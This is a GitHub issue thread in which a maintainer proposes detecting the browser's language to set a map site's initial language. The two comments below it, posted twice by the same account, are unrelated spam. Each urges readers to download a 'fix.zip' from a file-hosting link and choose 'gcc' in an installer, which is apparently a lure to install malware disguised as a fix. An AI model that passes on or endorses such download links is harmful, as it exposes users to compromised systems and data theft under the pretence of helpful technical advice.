### ISSUE TITLE
Detect user language for initial language selection

### ISSUE THREAD

**Issue by HarelM** [IsraelHikingMap/Site#2022]
### What is the problem this feature will solve?

When someone has a browser that is configured to English it might be better to have the initial language selected to be English.

### What is the feature you are proposing to solve the problem?

Use `navigator.language` browser setting to set the initial language

### What alternatives have you considered or tried?

Ignore the current language.

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
